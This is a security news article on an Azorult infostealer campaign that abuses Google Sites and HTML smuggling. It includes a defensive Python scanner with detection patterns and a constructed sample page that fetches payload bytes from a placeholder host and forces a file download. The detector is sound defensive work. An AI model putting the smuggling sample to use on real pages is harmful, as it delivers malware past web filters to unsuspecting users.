Sneaky Malware Campaign Abuses Google Sites to Deliver Data-Stealing Azorult

HTML smuggling code that collects Payload From Compromised Domain

Security researchers at Netskope Threat Labs have exposed a sophisticated malware campaign that leverages the trustworthiness of Google Sites to deliver a potent new version of the Azorult infostealer. This malware poses a significant cybersecurity risk due to its advanced capability to evade detection and steal a wide range of sensitive information.

What is Azorult?

Azorult Loader General Information using Detect It Easy

Azorult is a nasty program designed to steal your private information. It targets usernames, passwords, browsing history, and even cryptocurrency wallet data. Sadly, cases of Azorult theft are on the rise, especially within the healthcare industry.

Azorult has been identified as one of the top malware families preying on the healthcare sector over the past year. Its recent campaign, however, takes its nefarious activities to new heights, employing a multifaceted approach to deliver its payload while evading detection. The initial stage of the attack involves HTML smuggling, a technique that is becoming increasingly popular among cyber adversaries. This method bypasses web controls by constructing the malicious payload on the client side, using legitimate HTML5 features and JavaScript, so that no complete malicious file ever crosses the network perimeter as such. In a twist of ingenuity, this campaign doesn’t embed the payload in the JavaScript itself but in a separate JSON file hosted externally, adding an extra layer of stealth.

The Attack Unfolds

Unlike typical malware attacks, this Azorult campaign doesn’t rely on phishing emails or malicious downloads. Instead, the attackers carefully craft fake Google Docs pages hosted on the legitimate Google Sites platform. These decoy pages lure unsuspecting victims into thinking they are accessing a genuine document. However, a deceptive download is triggered, beginning the chain of infection.


The campaign’s insidiousness lies in its use of multiple techniques to fly under the radar of security software:

  • HTML Smuggling with a Twist: The attackers employ HTML smuggling to hide the malicious code. However, instead of embedding the code directly within the fake Google Doc, they store it separately on an external website. This clever maneuver helps to evade initial security checks.
  • CAPTCHA Gatekeeping: To thwart automated security scanners like VirusTotal, many of the attacker’s websites incorporate a CAPTCHA test. This extra step hinders analysis and keeps the malicious code hidden for longer.
  • Fileless Execution and AMSI Bypass: Once on a victim’s machine, the Azorult malware executes directly in memory (fileless execution), leaving minimal traces to alert traditional antivirus solutions. Additionally, the campaign uses Antimalware Scan Interface (AMSI) bypass techniques, effectively disabling a key security layer within Windows Defender and other antivirus products.
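The HTML smuggling stage described above (payload assembled in the browser from legitimate APIs, with the bytes pulled from an external JSON file rather than embedded in the script) is something a defender can hunt for in proxy logs, mail-gateway captures or saved pages. The following heuristic scanner is an added example and is not code from the Netskope write-up or from this article: it scores an HTML page for the client-side assembly primitives HTML smuggling depends on, and separately reports any external `.json` URLs the script fetches, which is the detail that distinguishes this campaign. The two sample pages, the host names (`*.invalid`), the indicator weights and the threshold are all constructed for illustration.

```python
import re
from dataclasses import dataclass, field

# Indicator table: (name, pattern, weight). These are the browser primitives a
# smuggling page needs to turn data into a downloaded file. Weights and the
# threshold below are illustrative assumptions, not a published rule set.
INDICATORS = [
    ("blob_constructor",   re.compile(r"new\s+Blob\s*\(", re.I), 2),
    ("object_url",         re.compile(r"URL\.createObjectURL\s*\(", re.I), 2),
    ("legacy_save_blob",   re.compile(r"msSaveOrOpenBlob", re.I), 2),
    ("base64_decode",      re.compile(r"\batob\s*\(", re.I), 1),
    ("download_attr",      re.compile(r"\.download\s*=|download\s*=\s*[\"']", re.I), 1),
    ("programmatic_click", re.compile(r"\.click\s*\(\s*\)", re.I), 1),
    ("external_fetch",     re.compile(r"\b(?:fetch|XMLHttpRequest)\b", re.I), 1),
]

# Indicators that actually build a file in the browser; at least one must be
# present before a page is called suspicious, so a plain data-driven page that
# merely fetches JSON is not flagged on the fetch alone.
ASSEMBLY = {"blob_constructor", "object_url", "legacy_save_blob"}
THRESHOLD = 4  # assumed cut-off for this example

# Remote .json URLs passed to fetch() or XMLHttpRequest.open("GET", ...).
EXTERNAL_JSON = re.compile(
    r"""(?:fetch\s*\(|\.open\s*\(\s*['"]GET['"]\s*,)\s*['"](https?://[^'"]+\.json)['"]""",
    re.I,
)


@dataclass
class Verdict:
    score: int = 0
    hits: list = field(default_factory=list)
    external_json_urls: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD and any(h in ASSEMBLY for h in self.hits)


def scan_html(page: str) -> Verdict:
    """Score one HTML document for HTML-smuggling indicators."""
    verdict = Verdict()
    for name, pattern, weight in INDICATORS:
        if pattern.search(page):
            verdict.hits.append(name)
            verdict.score += weight
    # Report external JSON sources as context for the analyst; on their own
    # they are not malicious, but combined with assembly primitives they match
    # the pattern this campaign uses.
    verdict.external_json_urls = EXTERNAL_JSON.findall(page)
    return verdict


# Constructed sample resembling the campaign's pattern: the payload bytes are
# fetched from a remote JSON file and only then turned into a download.
SAMPLE_SMUGGLING_PAGE = """
<html><body><h1>Document.pdf</h1>
<script>
  fetch("https://payload-host.invalid/doc.json")
    .then(r => r.json())
    .then(j => {
      const bytes = Uint8Array.from(atob(j.data), c => c.charCodeAt(0));
      const blob = new Blob([bytes], {type: "application/octet-stream"});
      const a = document.createElement("a");
      a.href = URL.createObjectURL(blob);
      a.download = "Document.zip";
      a.click();
    });
</script></body></html>
"""

# Constructed benign sample: fetches JSON to render a list, builds no file.
SAMPLE_BENIGN_PAGE = """
<html><body><ul id="items"></ul>
<script>
  fetch("https://api.example.invalid/items.json")
    .then(r => r.json())
    .then(items => items.forEach(i => {
      const li = document.createElement("li");
      li.textContent = i.name;
      document.getElementById("items").appendChild(li);
    }));
</script></body></html>
"""

if __name__ == "__main__":
    for label, page in (("smuggling", SAMPLE_SMUGGLING_PAGE), ("benign", SAMPLE_BENIGN_PAGE)):
        v = scan_html(page)
        print(f"{label}: suspicious={v.suspicious} score={v.score} hits={v.hits} "
              f"external_json={v.external_json_urls}")
```

The check deliberately requires an assembly primitive (`Blob`, `createObjectURL` or `msSaveOrOpenBlob`) in addition to the score, because a fetch of remote JSON is routine on legitimate pages; what is unusual is fetching JSON and then materialising it as a downloadable file with a programmatic click. Real campaigns obfuscate these identifiers, so in practice this heuristic belongs after a deobfuscation pass, and a page hosted on a trusted platform such as Google Sites should not be exempted from it.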

The Damage Azorult Does

Once on your computer, Azorult gets to work:

  • Snapshots Your Screen: It takes a picture of what you’re doing, potentially exposing private data at a glance.
  • Steals Browser Info: Usernames, passwords, and credit card numbers saved in your browser – all snatched.
  • Targets Crypto Wallets: Azorult aggressively targets over 100 different types of cryptocurrency wallets.
  • Grabs Your Files: It hunts for sensitive documents, adding to the potential damage.

The theft of this information can have devastating consequences, including identity theft, financial fraud, and corporate data breaches. The healthcare industry, in particular, has been heavily targeted by Azorult, highlighting the danger it poses to the safekeeping of sensitive medical records.